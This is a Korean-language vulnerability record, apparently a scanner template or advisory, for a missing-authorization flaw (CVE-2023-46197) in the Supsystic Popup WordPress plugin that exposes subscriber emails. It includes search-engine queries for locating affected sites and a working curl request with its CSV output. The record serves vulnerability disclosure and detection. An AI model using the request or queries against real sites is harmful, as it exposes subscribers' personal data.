
Supsystic의 Popup <= 1.10.19 - 민감 정보 노출로 이어지는 인증 누락
"WordPress용 Supsystic 플러그인의 팝업은 1.10.19까지의 모든 버전에서 getWpCsvList 액션을 통해 민감한 정보 노출에 취약합니다. 이로 인해 구독자 수준 이상의 인증된 공격자가 구독자 이메일 주소를 포함한 민감한 데이터를 추출할 수 있습니다."
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2023-46197
metadata:
fofa-query: "wp-content/plugins/popup-by-supsystic/"
google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
shodan-query: 'vuln:CVE-2023-46197'
slug: 'popup-by-supsystic'
curl "http://wordpress.lan/?mod=subscribe&action=getWpCsvList&pl=pps"
"Username";"Email";"Activated";"PopUp ID";"Date Created"